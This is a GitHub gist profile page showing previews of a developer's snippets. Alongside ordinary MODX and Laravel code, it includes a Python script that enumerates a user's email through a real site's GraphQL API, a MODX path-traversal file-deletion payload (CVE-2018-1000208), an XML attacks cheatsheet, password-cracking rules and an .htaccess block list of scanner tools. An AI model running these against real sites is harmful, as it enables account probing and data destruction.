Skip to content

Instantly share code, notes, and snippets.

❗️
Open to suggestions

Евгений Борисов AgelxNash

❗️
Open to suggestions
Block or report user

Report or block AgelxNash

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@AgelxNash
AgelxNash / CompressImages.php
Last active Aug 18, 2019
Комманда под artisan для сжатия картинок при помощи https://github.com/maksatweb/compressor.io-php
View CompressImages.php
<?php
namespace App\Console\Commands;
use Illuminate\Console\Command;
use App\Models;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
use serhatozles\compressio\CompressorIO;
View graphql.py
import itertools, argparse, requests, string
def generator(prefix):
for pass_tuple in itertools.product(ALPHABET, repeat=1):
yield prefix + ''.join(pass_tuple)
def validator(password):
data = {"query": "{users(where: {username: \"" + USERNAME + "\", email_starts_with: \"" + password + "\"}) {username}}"}
r = requests.post('https://api.modxclub.ru/', stream=True, json = data)
return r.status_code == 200 and r.text == '{"data":{"users":[{"username":"' + USERNAME +'"}]}}'
@AgelxNash
AgelxNash / paramEditFull.plugin.php
Created Jul 8, 2018
paramEditFull - Плагин для MODX Evolution адаптированный для работы на 1.4.х ветке http://modx-shopkeeper.ru/forum/viewtopic.php?id=688
View paramEditFull.plugin.php
//<?php
/**
* paramEditFull
*
* Удобное добавление и редактирование дополнительных параметров у товаров.
*
* @category plugin
* @version 2.0
* @license http://www.gnu.org/copyleft/gpl.html GNU Public License (GPL)
* @author Agel_Nash <modx@agel-nash.ru>, oleg.39style@gmail.com
@AgelxNash
AgelxNash / CVE-2018-1000208
Last active Jul 15, 2018
MODX Revolution - remove files /connectors/index.php with POST ['register' => 'fuck', 'topic' => '../../../../', 'clear' => 1, 'ctx' => 'mgr', 'action' => 'security/login']
View CVE-2018-1000208
public/
├── core
│   ├── cache
│   │   ├── lexicon_topics
│   │   │   └── lexicon
│   │   │   └── ru
│   │   │   └── core
│   │   │   └── login.cache.php
│   │   ├── registry
│   │   │   └── state
@AgelxNash
AgelxNash / xml-attacks.md
Created Feb 10, 2018 — forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet
View xml-attacks.md

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.


@AgelxNash
AgelxNash / navicat_tunnel.php
Created Oct 27, 2017 — forked from peterjaap/navicat_tunnel.php
Navicat tunnel file (the nearly unfindable ntunnel_mysql.php)
View navicat_tunnel.php
<?php //version my104
header("Content-Type: application/octet-stream");
error_reporting(0);
set_time_limit(0);
set_magic_quotes_runtime(0);
function phpversion_int()
{
list($maVer, $miVer, $edVer) = split("[/.-]", phpversion());
@AgelxNash
AgelxNash / .htaccess
Created Oct 1, 2017
Блокировка неугодных User Agent
View .htaccess
#Script kiddie blocker start
RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
View anRules.rule
i6
i7
i4
i5
i8
i3
s_
[ i5
$+ R6 R6
i9
View keybase.md

Keybase proof

I hereby claim:

  • I am AgelxNash on github.
  • I am agel_nash (https://keybase.io/agel_nash) on keybase.
  • I have a public key whose fingerprint is ECBB 7D98 3B14 718D A9EF 3F53 BEE0 4861 12F0 296F

To claim this, I am signing this object:

View bruteforce.php
<?php
$str = 'fD3_';
$chars = array_merge(range('a', 'z'), range('A', 'Z'), range('0', '9'), ['_']);
$total = 0;
$brut = '';
$len = strlen($str);
/**
* @see: https://www.programmingalgorithms.com/algorithm/brute-force?lang=PHP
*/
You can’t perform that action at this time.